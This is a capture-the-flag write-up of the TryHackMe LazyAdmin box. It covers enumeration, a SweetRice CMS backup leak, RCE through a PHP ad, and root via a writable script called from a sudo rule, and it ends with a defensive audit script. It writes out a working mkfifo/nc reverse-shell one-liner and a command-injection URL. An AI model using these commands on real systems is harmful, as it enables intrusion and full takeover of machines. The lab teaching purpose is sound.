TryHackMe - LazyAdmin

Summary

LazyAdmin is a Linux box. The initial scan found a SweetRice CMS, which has a backup disclosure issue; using it we can dump the credentials stored in the database. Logging in with those credentials, we see we can put PHP code in an ad, which gives us RCE. With the RCE we can get a shell. Running sudo -l shows that we can run a backup.pl script as root without a password, and reading backup.pl reveals that it calls a shell script which www-data can modify, which gives us a root shell.

Enumeration

nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 19:22 IST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 50.00% done; ETC: 19:22 (0:00:21 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 50.53% done; ETC: 19:22 (0:00:21 remaining)
Nmap scan report for 10.10.104.214
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.67 seconds

Web

gobuster - root

gobuster dir  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.104.214/ -x php -o root.gobust
/content

Content

gobuster - content

/index.php (Status: 200)
/images (Status: 301)
/js (Status: 301)
/inc (Status: 301)
/as (Status: 301)
/_themes (Status: 301)
/attachment (Status: 301)

Content - AS

Searchsploit shows us that there is a Backup Disclosure from

http://localhost/inc/mysql_backup

Backup Disclosure

http://10.10.104.214/content/inc/mysql_backup/

reveals the MySQL backup.

Checking the SQL dump we find the username manager and the password hash 42f749**********************afcb, which reveals the password as P*********3.

Checking Searchsploit again we find an RCE method by creating an ad and accessing it from

RCE

Creating an ad allows us to place PHP code in it, so we can use that to get code execution:

curl http://10.10.104.214/content/inc/ads/test.php?cmd=whoami

www-data

Shell

Using the RCE we can get a shell with php-reverse-shell.php from pentestmonkey.

Checking /home/itguy/ we see we can read user.txt as THM{63

Privilege Escalation

sudo -l reveals that we can run

www-data@THM-Chal:/home/itguy$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

and checking the script we see that it runs system('sh','/etc/copy.sh'); checking the permissions of /etc/copy.sh we see that www-data can modify it,

so we can place

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

and execute

sudo /usr/bin/perl /home/itguy/backup.pl

which gives us a shell as root:

root@THM-Chal:~# whoami;hostname;cut -c 1-10 root.txt
whoami;hostname;cut -c 1-10 root.txt
root
THM-Chal
THM{6637f4
root@THM-Chal:~#

and we have pwned LazyAdmin.
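The root cause of the privilege escalation is a sudo rule that runs backup.pl as root while /etc/copy.sh, which backup.pl executes, is writable by www-data. The following audit helper is an added example (not from the writeup or the box): given a script that a NOPASSWD sudo rule allows, it lists the absolute paths the script references and flags any that group or others can write. The function names and the temporary files it is fed are assumptions for illustration.

```shell
#!/bin/sh
# Added example: audit a sudo-permitted script for writable dependencies.
# Mirrors the LazyAdmin finding: backup.pl calls /etc/copy.sh, and copy.sh
# is writable by an unprivileged user, so root ends up running attacker input.

# Print every absolute path mentioned in the script, deduplicated.
referenced_paths() {
    grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u
}

# Succeed (exit 0) if the group or others write bit is set on the path,
# i.e. someone other than the owner could change what root will execute.
is_loosely_writable() {
    # GNU stat first, BSD/macOS stat as fallback; fail if neither works.
    mode=$(stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1" 2>/dev/null) || return 1
    perm=$(printf '%s' "$mode" | tail -c 3)   # drop setuid/setgid/sticky digit
    g=$(printf '%s' "$perm" | cut -c2)
    o=$(printf '%s' "$perm" | cut -c3)
    [ $((g & 2)) -ne 0 ] || [ $((o & 2)) -ne 0 ]
}

# Print "WRITABLE <path>" for each referenced path that exists and is
# loosely writable. Returns 1 if any was found (finding), 0 if clean.
audit_sudo_script() {
    found=0
    for p in $(referenced_paths "$1"); do
        [ -e "$p" ] || continue
        if is_loosely_writable "$p"; then
            echo "WRITABLE $p"
            found=1
        fi
    done
    return $found
}

# Usage: audit_sudo_script /home/itguy/backup.pl
```

On the box this would report /etc/copy.sh; the fix is to make the helper script root-owned and mode 755 (or drop the sudo rule entirely).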

Author: Shubham Kumar
Link: https://f3v3r.in/thm/lazyadmin/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.